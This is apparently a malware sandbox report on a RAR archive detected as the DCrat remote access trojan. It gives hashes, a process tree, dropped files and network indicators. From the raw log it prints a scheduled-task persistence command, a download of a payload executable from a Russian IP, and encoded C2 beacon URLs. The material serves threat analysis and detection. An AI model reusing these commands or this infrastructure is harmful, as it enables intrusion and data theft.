Field | Value
---|---
File name | SoftGL.rar
Full analysis | https://app.any.run/tasks/eec4c639-018b-4924-8605-128102ed8ed5
Verdict | Malicious activity
Threats | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first seen in 2018. It is modular malware that can be customized to perform different tasks: for instance, it can steal passwords and crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.
Analysis date | June 27, 2022, 12:16:01
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/x-rar
File info | RAR archive data, v5
MD5 | 53A97C9DE32C868B76796DF4E141BE92
SHA1 | CB63E6DDF6A7976D03683D6974F0FBA6FCA6C521
SHA256 | 2913C2F741EDF9BFE1A120119B79251EB33E402C24EEEC24B0D57B58A6090836
SSDEEP | 98304:1McuYJUcS7ivy9kEaDhgjj39oDO3sI66z4:yhB2vy9kEBjL9oa3sla4
Extension | Type | Confidence (%)
---|---|---
.rar | RAR compressed archive (v5.0) | 61.5
.rar | RAR compressed archive (gen) | 38.4
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
1560 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SoftGL.rar" | C:\Program Files\WinRAR\WinRAR.exe | — | Explorer.EXE | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.91.0
2592 | "C:\Users\admin\Desktop\SoftGL.exe" | C:\Users\admin\Desktop\SoftGL.exe | — | Explorer.EXE | User: admin; Integrity Level: MEDIUM; Exit code: 3221225477
35476 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | — | SoftGL.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft .NET ClickOnce Launch Utility; Exit code: 0; Version: 4.0.30319.34209 built by: FX452RTMGDR
36020 | C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | C:\Windows\System32\rundll32.exe | — | AppLaunch.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
36348 | "C:\Users\admin\AppData\Local\Temp\Lanskoy.exe" | C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | — | rundll32.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
36608 | "C:\Windows\System32\WScript.exe" "C:\reviewsessionHost\C97NJf0jgM8RgM1JKct2s5VaBxnwYd.vbe" | C:\Windows\System32\WScript.exe | — | Lanskoy.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
36724 | "C:\Windows\System32\WScript.exe" "C:\reviewsessionHost\file.vbs" | C:\Windows\System32\WScript.exe | — | Lanskoy.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
2108 | C:\Windows\system32\cmd.exe /c ""C:\reviewsessionHost\k3Cu6zMzjknS1GJIS.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3412 | "C:\reviewsessionHost\BrokerNet.exe" | C:\reviewsessionHost\BrokerNet.exe | — | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0; Version: 5.15.2.0
3988 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\admin\Downloads\csrss.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Operation | Key | Name | Value
---|---|---|---|---|---
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | 
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | 
1560 | WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E | LanguageList | en-US
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 2 | C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 1 | C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\SoftGL.rar
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120
1560 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3412 | BrokerNet.exe | C:\reviewsessionHost\IMEDICTUPDATE.exe | executable | 98A82A4C14B8408AA73EE546B9E38D66 | E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7
35476 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | executable | 497C81D4177C2F2C0724B57DA4E3BECA | C66C491BF92E6185A293FC73CD26E06310A956EAACC05FE0C719B8936FA002C6
3412 | BrokerNet.exe | C:\Users\admin\Downloads\886983d96e3d3e | text | 6EE756327376FA00CA35F77D9EBFCCAE | 181F79E427892552229FFE471A87B5D8DE6FC23CD6900A2D166DBFD786CBBDBC
36348 | Lanskoy.exe | C:\reviewsessionHost\C97NJf0jgM8RgM1JKct2s5VaBxnwYd.vbe | vbe | 6B857F5FBB6E7FCA7C8AEDCBFFB27138 | FF6BDEA960B6F0B6D2BDE9ACD59A20F8E99688BC8D74BEAEF6A7DFC90338108F
3412 | BrokerNet.exe | C:\reviewsessionHost\1173b9a28a9c10 | text | 4E79DE1FCB032CF733A605113ED77F66 | 7969BB872161757D65B1F3C7172B7CEA49439B7E6DC324AC73FA6378CCB95FF8
1560 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb1560.32895\SoftGL.exe | executable | C0932C322488F2FC6FEC7E199CDA3468 | 8FE7F35D1C24E68DC54D8795CE1CF3661FBAC93773C6918514E999027740B976
3412 | BrokerNet.exe | C:\Users\admin\Downloads\csrss.exe | executable | 98A82A4C14B8408AA73EE546B9E38D66 | E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7
36348 | Lanskoy.exe | C:\reviewsessionHost\k3Cu6zMzjknS1GJIS.bat | text | 4706EB22D3B04AC667C12AA11E52477D | CE2766D2F101B086B5BFC543793B2337D91ADE2584A2DC37F705A0E0D8910B90
36348 | Lanskoy.exe | C:\reviewsessionHost\BrokerNet.exe | executable | 98A82A4C14B8408AA73EE546B9E38D66 | E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7
36348 | Lanskoy.exe | C:\reviewsessionHost\file.vbs | text | 677CC4360477C72CB0CE00406A949C61 | F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4328 | csrss.exe | GET | — | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&8ae9b73744cf429dffe0077659d7eca9=0VfiIiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiI2QzNkFGOhVTY3IGMkFmZ1czYzQmNlVWNzUmZ5U2M5IWNiJzY0gzYzIiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
4328 | csrss.exe | GET | — | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nI1czY2QzY5YmYkVmY4UmYmVmZmNmZlVWM1AjNzQmYiFmZycTZhBDMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&8ae9b73744cf429dffe0077659d7eca9=0VfiIiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiIyMWNkljN0cTN3cTNilTNlZDMwYDM1QmZiNDZyEGZ3YWNlFDZhVTMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
35476 | AppLaunch.exe | GET | 200 | 185.112.83.99:80 | http://185.112.83.99:80/Lanskoy.exe | RU | executable | 3.04 Mb | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?N8qyiaI1KKpnXTUHchAw6soLUwSKHwq=7yRPxJCkWkWo3ZNAH&qfsBCfUfdvI8tXdJqiBFTSfZZ=V9R4jRDUGKx6&w4RqQcY09Luto9BdY9TmqJUNi=04YRTVt&bc4ab1fca2b8c32b54ee901a43bc57b6=5ef2b7af8dc3f350c93776891a78c608&bc00a30df5d4da97ac074521e205c2f8=QZlVGO4kTM2EDNiRWY0QWOkZTM4gjYlZ2MlBTM4MjNmJDN1Q2YzMjM&N8qyiaI1KKpnXTUHchAw6soLUwSKHwq=7yRPxJCkWkWo3ZNAH&qfsBCfUfdvI8tXdJqiBFTSfZZ=V9R4jRDUGKx6&w4RqQcY09Luto9BdY9TmqJUNi=04YRTVt | RU | text | 2.02 Kb | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nI3ETOzIDMxIGO2UWYkljZ1UGO5YjN5MGZmlTOidzY5MzNkNzNkJ2YiJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | text | 104 b | malicious |
4664 | AppLaunch.exe | GET | 200 | 185.112.83.99:80 | http://185.112.83.99:80/Lanskoy.exe | RU | executable | 3.04 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
35476 | AppLaunch.exe | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
— | — | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
35476 | AppLaunch.exe | 185.112.83.99:80 | — | Total Server Solutions L.L.C. | RU | malicious |
35824 | WerFault.exe | 104.208.16.93:443 | watson.microsoft.com | Microsoft Corporation | US | suspicious |
4664 | AppLaunch.exe | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
4664 | AppLaunch.exe | 185.112.83.99:80 | — | Total Server Solutions L.L.C. | RU | malicious |
4328 | csrss.exe | 34.117.59.81:443 | ipinfo.io | — | US | whitelisted |
4328 | csrss.exe | 217.28.221.151:80 | — | SIBCOM Ltd. | RU | malicious |
4328 | csrss.exe | 149.154.167.220:443 | api.telegram.org | Telegram Messenger LLP | GB | malicious |
Domain | IP | Reputation
---|---|---
watson.microsoft.com | | whitelisted
ipinfo.io | | shared
api.telegram.org | | shared
PID | Process | Class | Message |
---|---|---|---|
35476 | AppLaunch.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4664 | AppLaunch.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4328 | csrss.exe | A Network Trojan was detected | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
4328 | csrss.exe | Potential Corporate Privacy Violation | ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) |
— | — | Misc activity | ET INFO Telegram API Domain in DNS Lookup |
4328 | csrss.exe | Misc activity | ET INFO Observed Telegram API Domain (api .telegram .org in TLS SNI) |
4328 | csrss.exe | Misc activity | ET POLICY Telegram API Certificate Observed |